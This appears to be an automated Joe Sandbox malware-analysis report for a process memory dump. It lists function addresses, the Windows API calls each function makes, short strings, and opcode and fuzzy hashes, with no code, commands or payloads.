Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6A51D432311E80CBFB5ACB25EC88B6CB795F39AB99F154121DA4A477D8DB78C849C704

Function 000002527DF18CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002527DF18CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002527DF18D62
RtlUnwindEx.NTDLL ref: 000002527DF18DBC

Strings

csm, xrefs: 000002527DF18D49

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 218c7376ad86fcb063fceb1bc192f36e7a9ae763a4ac344b52ccc8afbb992f0e
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: BF511732301E00EADB58CF15E94CB6CB791F35AB99F144124DE6A477C8DB7AC849C706

Function 000002527DEEA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002527DEEA75B
_CallSETranslator.LIBVCRUNTIME ref: 000002527DEEA7A7

Strings

MOC, xrefs: 000002527DEEA76F
RCC, xrefs: 000002527DEEA777

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 882c261d0ab20e97ee580f7e62db06b2a2d993ae6bfdabb67cc244184ddae78d
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: BF619F32504BC4C2EB22CF25E94479AF7A0F78AB99F044219EB9813BD5DB7CC198CB04

Function 000002527DEEAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002527DEEAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002527DEEABBC

Strings

csm, xrefs: 000002527DEEAAF6
csm, xrefs: 000002527DEEAC0E

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 5c5b630e88cdec5bdc2d08063a88383d8dbd773f8a78001b521321945897e49f
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 17518032200B80CBFB76CF31DA48358B7A1F75AB9AF14411ADA9947BD5CB38D458D709

Function 000002527DF1A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002527DF1A75B
_CallSETranslator.LIBVCRUNTIME ref: 000002527DF1A7A7

Strings

MOC, xrefs: 000002527DF1A76F
RCC, xrefs: 000002527DF1A777

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 5380cf3883ef2ff7e5b8a126726b4f4f882cf1557a56e4d3423cdec9f33a1321
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 7861CD32508BC4C1EB21CF15E94439EF7A0F78AB99F448215EBA813BD9CB39C199CB05

Function 000002527DF1AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002527DF1AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002527DF1ABBC

Strings

csm, xrefs: 000002527DF1AC0E
csm, xrefs: 000002527DF1AAF6

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: fc0541b48e77c2fbf6773572276bebd2944f4f5e018167edf1ec6f093410424d
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: AE51D432201B80CBEB74CF12DA48358F7A1F35AB86F144116DAA947BD5CB3AD45AC74B

Function 000002527DEB9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002527DEB9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002527DEB9FBC

Strings

csm, xrefs: 000002527DEBA00E
csm, xrefs: 000002527DEB9EF6

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 5aff4a8465f2407c66cc840aed800b108880c478786311b8ffff91a9f4a9c980
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 5C516132204A80CBEF76CF119E48B68FBE0F35AB96F144115DA9947BD5CB78E458CB09

Function 000002527DEE3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000002527DEE3972
StrStrW.SHLWAPI ref: 000002527DEE3990
StrToIntW.SHLWAPI ref: 000002527DEE39B7

Part of subcall function 000002527DEE1A30: OpenProcess.KERNEL32 ref: 000002527DEE1A56
Part of subcall function 000002527DEE1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002527DEE1A74
Part of subcall function 000002527DEE1A30: PathFindFileNameW.SHLWAPI ref: 000002527DEE1A83
Part of subcall function 000002527DEE1A30: lstrlenW.KERNEL32 ref: 000002527DEE1A8F
Part of subcall function 000002527DEE1A30: StrCpyW.SHLWAPI ref: 000002527DEE1AA2
Part of subcall function 000002527DEE1A30: CloseHandle.KERNEL32 ref: 000002527DEE1AB0

Part of subcall function 000002527DEE3F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DEE272F), ref: 000002527DEE3FA0

Strings

pid_, xrefs: 000002527DEE3968

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 7a62843f48c07f9f74b00b35efb6c2cf4d938e4e2909eaf4d6757d65c2bf41fe
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 9A115E21310F81D3FB52DB36EC4835AA2A4F75EB82F9444259A4D836D8EF78C98DC708

Function 000002527DF13950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000002527DF13972
StrStrW.SHLWAPI ref: 000002527DF13990
StrToIntW.SHLWAPI ref: 000002527DF139B7

Part of subcall function 000002527DF11A30: OpenProcess.KERNEL32 ref: 000002527DF11A56
Part of subcall function 000002527DF11A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002527DF11A74
Part of subcall function 000002527DF11A30: PathFindFileNameW.SHLWAPI ref: 000002527DF11A83
Part of subcall function 000002527DF11A30: lstrlenW.KERNEL32 ref: 000002527DF11A8F
Part of subcall function 000002527DF11A30: StrCpyW.SHLWAPI ref: 000002527DF11AA2
Part of subcall function 000002527DF11A30: CloseHandle.KERNEL32 ref: 000002527DF11AB0

Part of subcall function 000002527DF13F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DF1272F), ref: 000002527DF13FA0

Strings

pid_, xrefs: 000002527DF13968

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 4fa9bbf0e5a0377572b543538df4aee52f2079589256d75b53ad59bd14e9fc63
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 89117F25310F82D1EB10DB25EC0839AE6E4F74E782F804425DA69836D4EF7AC94DC74A

Function 000002527DEF1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002527DEF2027
WriteFile.KERNEL32 ref: 000002527DEF2304
WriteFile.KERNEL32 ref: 000002527DEF234A
GetLastError.KERNEL32 ref: 000002527DEF2409

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 2c26158bb2ceb16ee56ebe59e2b37ee2bcd967fe8cf3e7d06adee3600331b13e
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: C2D1CB32714A84CAE752CFA5D8482DCB7B2F35AB99F404216CE5DABBD9DB34C10AC744

Function 000002527DF21FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002527DF22027
WriteFile.KERNEL32 ref: 000002527DF22304
WriteFile.KERNEL32 ref: 000002527DF2234A
GetLastError.KERNEL32 ref: 000002527DF22409

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: f5bfd0f21b086f6b035cdc4bf35f44a978cb66ad0f933ddf6f716cbe208585d8
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: CBD1EA32704A80CAE710CFA5DC4839DB7B1F34AB99F844216CE6DA7BD9DA34D10AC385

Function 000002527DEE14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DEE14C6
HeapFree.KERNEL32 ref: 000002527DEE14D5
GetProcessHeap.KERNEL32 ref: 000002527DEE14E2
HeapFree.KERNEL32 ref: 000002527DEE14F1
GetProcessHeap.KERNEL32 ref: 000002527DEE1501

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 643012c8a3779b641f9c28f77f73857ab07dd42024197a4b05d4026c4aa0a446
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 56015732610E80DAE755DF66EC08149BBA0F78EF82F094025DB49437A8EE34E295C744

Function 000002527DF114A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DF114C6
HeapFree.KERNEL32 ref: 000002527DF114D5
GetProcessHeap.KERNEL32 ref: 000002527DF114E2
HeapFree.KERNEL32 ref: 000002527DF114F1
GetProcessHeap.KERNEL32 ref: 000002527DF11501

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: acede0dc9e98495ac7b8b2263fbb0a2ca34235f3cf367bf292061ff172e002db
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 27015732610E90EAE714DF66AC0925EB7A0F78EF85B094025DB69437A8DE38E055C784

Function 000002527DEF28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002527DEF28DF), ref: 000002527DEF2A12

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 8c1085d562dbe0c9e31e34705be67a8a99d193dbcfef09c6c087d29eda5cca8a
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: CB91B132610E54DAFBA2CF659C583ADABA0F35FB89F444106DE4A97AC5DB34C44AC308

Function 000002527DF228F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002527DF228DF), ref: 000002527DF22A12

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 4175e2b66585a0e8a822c69a13f5f510e820ddbadd1d7d0d8e3fedb934ecbb3a
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: F3910132610E50D9FB60CF659C583AEBBA0F35EB99F444106DE2A67BC5CB34D049C78A

Function 000002527DF18090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002527DF180BC
GetCurrentThreadId.KERNEL32 ref: 000002527DF180CA
GetCurrentProcessId.KERNEL32 ref: 000002527DF180D6
QueryPerformanceCounter.KERNEL32 ref: 000002527DF180E6

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: e4de4b7ef3061a5bbf11ad1a2d174306c51b37ae4cd4956117a43edeeaa50992
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 7B112726710F04CAEB00CF60EC593A973A4F71E759F440E25EA6D967E8DB78D1588385

Function 000002527DEE27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002527DEE28CC
StrCpyW.SHLWAPI ref: 000002527DEE28E5

Part of subcall function 000002527DEE3F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DEE272F), ref: 000002527DEE3FA0

Strings

\\.\pipe\, xrefs: 000002527DEE28D7

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: ae446885a8b35847f494e10943aa2f3d87b584257ad9c3e5cbdbf9f2baa3c292
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: A4718E36200F81D3F776DE3AAC583AAA794F38EB86F54401ADD0943BC8DA75C6088708

Function 000002527DF127E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002527DF128CC
StrCpyW.SHLWAPI ref: 000002527DF128E5

Part of subcall function 000002527DF13F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DF1272F), ref: 000002527DF13FA0

Strings

\\.\pipe\, xrefs: 000002527DF128D7

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 0d31cc20e0154680a679d6ce7940d9f2c7c5619e963531c2ef59a75cbd70e63b
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: B771A336204F81D2EB74DE6A9C593EAA794F38EB86F440016DD6947BC8DE36C60CC749

Function 000002527DEB80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002527DEB80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002527DEB8162

Strings

csm, xrefs: 000002527DEB8149

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

